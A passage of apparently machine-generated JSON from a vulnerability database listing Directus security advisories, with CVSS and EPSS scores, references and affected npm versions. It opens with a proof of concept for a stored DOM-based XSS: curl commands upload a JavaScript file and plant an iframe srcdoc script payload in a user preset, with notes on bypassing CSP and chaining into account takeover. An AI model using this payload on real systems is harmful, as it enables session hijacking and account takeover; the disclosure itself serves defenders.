This PoC will show an alert message.\n\n```js\nexport TARGET_HOST=\"http://localhost:8055\"\nexport ATTACKER_EMAIL=\"malicious@malicious.com\"\nexport ATTACKER_PASSWORD=\"123456\"\nroot_dir=$(dirname $0)\nmkdir \"${root_dir}/static\"\n\ncurl -s -k -o /dev/null -w \"%{http_code}\" -X 'POST' \"${TARGET_HOST}/auth/login\" \\\n    -c \"${root_dir}/static/attacker_directus_session_token\" \\\n    -H 'Content-Type: application/json' \\\n    -d \"{\\\"email\\\":\\\"${ATTACKER_EMAIL}\\\",\\\"password\\\":\\\"${ATTACKER_PASSWORD}\\\",\\\"mode\\\":\\\"session\\\"}\"\n\nid_url_file=$(echo \"alert('Successful DOM-based XSS')\" |\n  curl -s -k -X 'POST' \"${TARGET_HOST}/files\" \\\n    -b \"${root_dir}/static/attacker_directus_session_token\" \\\n    -F \"file=@-;type=application/x-javascript;filename=poc.js\" | jq -r \".data.id\")\n```\n\n2. Create a preset for a collection and store the preset ID.\n\nOr use a preset already created from GET /presets. The following example uses the direct_users preset.\n\n```\nattacker_user_id=$(curl -s -k \"${TARGET_HOST}/users/me\" \\ -b \"${root_dir}/static/attacker_directus_session_token\" | jq -r \".data.id\") curl -i -s -k -X 'POST' \"${TARGET_HOST}/presets\" \\ -H 'Content-Type: application/json' \\ -b \"${root_dir}/static/attacker_directus_session_token\" \\ --data-binary \"{\\\"layout\\\":\\\"cards\\\",\\\"bookmark\\\":null,\\\"role\\\":null,\\\"user\\\":\\\"${attacker_user_id}\\\",\\\"search\\\":null,\\\"filter\\\":null,\\\"layout_query\\\":{\\\"cards\\\":{\\\"sort\\\":[\\\"email\\\"]}},\\\"layout_options\\\":{\\\"cards\\\":{\\\"icon\\\":\\\"account_circle\\\",\\\"title\\\":\\\"<iframe srcdoc=\\\\\\\"<script src='http://localhost:8055/assets/${id_url_file}'> </script>\\\\\\\">\\\",\\\"subtitle\\\":\\\"{{ email }}\\\",\\\"size\\\":4}},\\\"refresh_interval\\\":null,\\\"icon\\\":\\\"bookmark\\\",\\\"color\\\":null,\\\"collection\\\":\\\"directus_users\\\"}\"\n```\n\nWhen the user visits the view that uses the directus_users preset, the 
JavaScript file will be executed.\n\nNotes:\n\nNeed to use an iframe to execute the malicious JavaScript file to bypass the CSP policies. The payload structure is `<iframe srcdoc=\\\"<script src='URL_MALICIOUS_FILE'> </script>\\\">`.\n\nWe can target any collection that uses the vulnerable template structure that renders the layout option section.\n\nIn this PoC, the target is the same user who sends the payload, but if the attacking user has permission to modify or create presets for other users or even if he does not have permissions but can chain with CVE-2024-6534, he can achieve an account takeover.","references":[{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"3.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:N/I:L/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-9qrm-48qf-r2rw","reference_id":"","reference_type":"","scores":[{"value":"3.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:N/I:L/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus/security/advisories/GHSA-9qrm-48qf-r2rw"},{"reference_url":"https://github.com/advisories/GHSA-9qrm-48qf-r2rw","reference_id":"GHSA-9qrm-48qf-r2rw","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-9qrm-48qf-r2rw"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/193996?format=json","purl":"pkg:npm/directus@11.3.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3kmj-b584-9ubg"},{"vulnerability":"VCID-4wtt-tffj-bbeb"},{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-5u8r-s8tz-guhm"},{"vulnerability":"VCID-7fzh-j76t-5kd3"},{"vulnerability":"VCID-7mea-hn69-wuhu"},{"vulnerab
ility":"VCID-7zt3-dcnm-hqfb"},{"vulnerability":"VCID-anfb-6kfn-a7h7"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-bh2g-b9dd-d3d9"},{"vulnerability":"VCID-g34r-4mb9-afab"},{"vulnerability":"VCID-gwwu-p9jt-eke3"},{"vulnerability":"VCID-hed8-anm5-ukc9"},{"vulnerability":"VCID-hhwc-1jxe-7yaw"},{"vulnerability":"VCID-hpbn-rr29-2yck"},{"vulnerability":"VCID-jjth-fmsp-rfcj"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-na3v-me78-aqcg"},{"vulnerability":"VCID-nvha-b5tb-dqdt"},{"vulnerability":"VCID-p1m5-v3rs-wbh7"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-pwt9-krmn-7kdd"},{"vulnerability":"VCID-tt5x-yjzf-4yab"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-wn2j-dtpz-hye1"},{"vulnerability":"VCID-xtcw-1jv1-s7ax"},{"vulnerability":"VCID-y1vf-15p4-rfca"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.3.3"}],"aliases":["GHSA-9qrm-48qf-r2rw"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-wgag-36wa-qyay"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/306030?format=json","vulnerability_id":"VCID-wn2j-dtpz-hye1","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-53887","reference_id":"","reference_type":"","scores":[{"value":"0.00316","scoring_system":"epss","scoring_elements":"0.54927","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-53887"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/commit/e74f3e4e92edc33b5f83eefb001a3d2a85af17a3","reference
_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:45:18Z/"}],"url":"https://github.com/directus/directus/commit/e74f3e4e92edc33b5f83eefb001a3d2a85af17a3"},{"reference_url":"https://github.com/directus/directus/pull/25353","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:45:18Z/"}],"url":"https://github.com/directus/directus/pull/25353"},{"reference_url":"https://github.com/directus/directus/releases/tag/v11.9.0","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:45:18Z/"}],"url":"https://github.com/directus/directus/releases/tag/v11.9.0"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-rmjh-cf9q-pv7q","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:45:18Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-rmjh-cf9q-pv7q"},{"reference_url":"https://nvd.nist.gov
/vuln/detail/CVE-2025-53887","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-53887"},{"reference_url":"https://github.com/advisories/GHSA-rmjh-cf9q-pv7q","reference_id":"GHSA-rmjh-cf9q-pv7q","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-rmjh-cf9q-pv7q"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/195594?format=json","purl":"pkg:npm/directus@11.9.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3kmj-b584-9ubg"},{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-5u8r-s8tz-guhm"},{"vulnerability":"VCID-7zt3-dcnm-hqfb"},{"vulnerability":"VCID-anfb-6kfn-a7h7"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-gwwu-p9jt-eke3"},{"vulnerability":"VCID-hed8-anm5-ukc9"},{"vulnerability":"VCID-jjth-fmsp-rfcj"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-na3v-me78-aqcg"},{"vulnerability":"VCID-nvha-b5tb-dqdt"},{"vulnerability":"VCID-p1m5-v3rs-wbh7"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-tt5x-yjzf-4yab"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-xtcw-1jv1-s7ax"},{"vulnerability":"VCID-y1vf-15p4-rfca"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.9.0"}],"aliases":["CVE-2025-53887","GHSA-rmjh-cf9q-pv7q"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-wn2j-dtpz-hye1"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/264506?format=json","vulnerability_id":"VCID-xt9c-32g5-mqes","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-45596","reference_id":"","reference_type":"","scores":[{"value":"0.00753","sco
ring_system":"epss","scoring_elements":"0.73508","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-45596"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L422-L428","reference_id":"","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L422-L428"},{"reference_url":"https://github.com/directus/directus/blob/main/api/src/auth/drivers/openid.ts#L453-L459","reference_id":"","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus/blob/main/api/src/auth/drivers/openid.ts#L453-L459"},{"reference_url":"https://github.com/directus/directus/commit/4aace0bbe57232e38cd6a287ee475293e46dc91b","reference_id":"","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:
N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-10T19:20:20Z/"}],"url":"https://github.com/directus/directus/commit/4aace0bbe57232e38cd6a287ee475293e46dc91b"},{"reference_url":"https://github.com/directus/directus/commit/769fa22797bff5a9231599883b391e013f122e52","reference_id":"","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-10T19:20:20Z/"}],"url":"https://github.com/directus/directus/commit/769fa22797bff5a9231599883b391e013f122e52"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-45596","reference_id":"CVE-2024-45596","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-45596"},{"reference_url":"https://github.com/advisories/GHSA-cff8-x7jv-4fm8","reference_id":"GHSA-cff8-x7jv-4fm8","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cff8-x7jv-4fm8"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-cff8-x7jv-4fm8","reference_id":"GHSA-cff8-x7jv-4fm8","refe
rence_type":"","scores":[{"value":"7.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-10T19:20:20Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-cff8-x7jv-4fm8"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/82736?format=json","purl":"pkg:npm/directus@10.13.3","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.13.3"},{"url":"http://public2.vulnerablecode.io/api/packages/82738?format=json","purl":"pkg:npm/directus@11.1.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3kmj-b584-9ubg"},{"vulnerability":"VCID-4wtt-tffj-bbeb"},{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-5u8r-s8tz-guhm"},{"vulnerability":"VCID-7fzh-j76t-5kd3"},{"vulnerability":"VCID-7mea-hn69-wuhu"},{"vulnerability":"VCID-7zt3-dcnm-hqfb"},{"vulnerability":"VCID-anfb-6kfn-a7h7"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-bh2g-b9dd-d3d9"},{"vulnerability":"VCID-bjzg-mzjf-cfau"},{"vulnerability":"VCID-g34r-4mb9-afab"},{"vulnerability":"VCID-gwwu-p9jt-eke3"},{"vulnerability":"VCID-hed8-anm5-ukc9"},{"vulnerability":"VCID-hhwc-1jxe-7yaw"},{"vulnerability":"VCID-hpbn-rr29-2yck"},{"vulnerability":"VCID-jjth-fmsp-rfcj"},{"vulnerability":"VCID-m3wb-sstx-v3d6"},{"vulnerability":"VCID-m5ng-dsfx-6qev"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-na3v-me78-aqcg"},{"vulnerability":"VCID-nvha-b5tb-dqdt"},{"vulnerability":"VCID-p1m5-v3rs-wbh7"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"v
ulnerability":"VCID-pwt9-krmn-7kdd"},{"vulnerability":"VCID-tt5x-yjzf-4yab"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-w1ph-v2n1-nbby"},{"vulnerability":"VCID-wgag-36wa-qyay"},{"vulnerability":"VCID-wn2j-dtpz-hye1"},{"vulnerability":"VCID-xtcw-1jv1-s7ax"},{"vulnerability":"VCID-y1vf-15p4-rfca"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.1.0"}],"aliases":["CVE-2024-45596","GHSA-cff8-x7jv-4fm8"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-xt9c-32g5-mqes"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/330170?format=json","vulnerability_id":"VCID-xtcw-1jv1-s7ax","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35410","reference_id":"","reference_type":"","scores":[{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.03706","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35410"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-cf45-hxwj-4cfj","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-07T14:47:25Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-cf45-hxwj-4cf
j"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35410","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35410"},{"reference_url":"https://github.com/advisories/GHSA-cf45-hxwj-4cfj","reference_id":"GHSA-cf45-hxwj-4cfj","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cf45-hxwj-4cfj"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/188455?format=json","purl":"pkg:npm/directus@11.16.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-y1vf-15p4-rfca"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.16.1"}],"aliases":["CVE-2026-35410","GHSA-cf45-hxwj-4cfj"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-xtcw-1jv1-s7ax"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/330980?format=json","vulnerability_id":"VCID-y1vf-15p4-rfca","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-39942","reference_id":"","reference_type":"","scores":[{"value":"0.0004","scoring_system":"epss","scoring_elements":"0.12292","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-39942"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:H/A:N"
},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/releases/tag/v11.17.0","reference_id":"","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-09T17:47:33Z/"}],"url":"https://github.com/directus/directus/releases/tag/v11.17.0"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-393c-p46r-7c95","reference_id":"","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-09T17:47:33Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-393c-p46r-7c95"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-39942","reference_id":"","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-39942"},{"reference_url":"https://github.com/advisories/GHSA-393c-p46r-7c95","reference_id":"GHSA-393c-p46r-7c95","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-393c-p46r-7c95"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/188807?format=json","purl":"pkg:npm/directus@11.17.0","is_vulnerable":false,"
affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.17.0"}],"aliases":["CVE-2026-39942","GHSA-393c-p46r-7c95"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-y1vf-15p4-rfca"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/341112?format=json","vulnerability_id":"VCID-yutw-33sk-5fg3","summary":"Duplicate Advisory: Improper access control in Directus","references":[{"reference_url":"https://directus.io","reference_id":"","reference_type":"","scores":[{"value":"4.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://directus.io"},{"reference_url":"https://fluidattacks.com/advisories/capaldi","reference_id":"","reference_type":"","scores":[{"value":"4.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://fluidattacks.com/advisories/capaldi"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"4.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-6534","reference_id":"CVE-2024-6534",
"reference_type":"","scores":[{"value":"4.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-6534"},{"reference_url":"https://github.com/advisories/GHSA-q83v-hq3j-4pq3","reference_id":"GHSA-q83v-hq3j-4pq3","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-q83v-hq3j-4pq3"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/82574?format=json","purl":"pkg:npm/directus@10.13.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3kmj-b584-9ubg"},{"vulnerability":"VCID-4wtt-tffj-bbeb"},{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-5u8r-s8tz-guhm"},{"vulnerability":"VCID-7fzh-j76t-5kd3"},{"vulnerability":"VCID-7mea-hn69-wuhu"},{"vulnerability":"VCID-7zt3-dcnm-hqfb"},{"vulnerability":"VCID-anfb-6kfn-a7h7"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-bh2g-b9dd-d3d9"},{"vulnerability":"VCID-g34r-4mb9-afab"},{"vulnerability":"VCID-gwwu-p9jt-eke3"},{"vulnerability":"VCID-hed8-anm5-ukc9"},{"vulnerability":"VCID-hhwc-1jxe-7yaw"},{"vulnerability":"VCID-hpbn-rr29-2yck"},{"vulnerability":"VCID-jjth-fmsp-rfcj"},{"vulnerability":"VCID-kqs7-8txh-jyc8"},{"vulnerability":"VCID-m3wb-sstx-v3d6"},{"vulnerability":"VCID-m5ng-dsfx-6qev"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-msb5-197k-a3er"},{"vulnerability":"VCID-na3v-me78-aqcg"},{"vulnerability":"VCID-nvha-b5tb-dqdt"},{"vulnerability":"VCID-p1m5-v3rs-wbh7"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-pwt9-krmn-7kdd"},{"vulnerability":"VCID-tt5x-yjzf-4yab"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-wgag-36
